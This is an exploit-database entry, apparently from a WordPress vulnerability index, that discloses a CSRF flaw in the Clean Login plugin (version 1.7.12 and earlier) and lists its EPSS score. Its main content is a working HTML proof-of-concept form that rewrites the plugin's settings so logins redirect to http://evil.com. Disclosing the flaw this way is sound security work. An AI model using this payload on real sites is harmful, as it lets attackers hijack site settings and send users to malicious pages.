Lucene search

K
wpexploitEthicalhack3rWPEX-ID:4D9AE2E7-E78F-4C78-88F5-8DDC414DF557
HistoryMay 05, 2017 - 12:00 a.m.

Clean Login <= 1.7.12 - Change Redirect URL CSRF

2017-05-0500:00:00
ethicalhack3r
7

0.001 Low

EPSS

Percentile

48.9%

The Clean Login WordPress plugin was affected by a Change Redirect URL CSRF security vulnerability.

<form method="POST" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wpcsw_settings";>

  <input type="text" name= "adminbar" value="on">

ā€ƒ<input type="text" name="emailnotificationcontent" value="">
ā€ƒ<input type="text" name="termsconditionsMSG" value="">
ā€ƒ<input type="text" name="termsconditionsURL" value="">
ā€ƒ<input type="text" name="urlredirect" value="http://127.0.0.1/wordpress">
ā€ƒ<input type="text" name="loginredirect" value="on">
ā€ƒ<input type="text" name="loginredirect_url" value="http://evil.com">
ā€ƒ<input type="text" name="logoutredirect_url" value="http://127.0.0.1/wordpress">
ā€ƒ<input type="text" name="cl_hidden_field" value="hidden_field_to_update_others">
ā€ƒ<input type="text" name="Submit" value="Save Changes">
   <input type="submit">

</form>

0.001 Low

EPSS

Percentile

48.9%

Related for WPEX-ID:4D9AE2E7-E78F-4C78-88F5-8DDC414DF557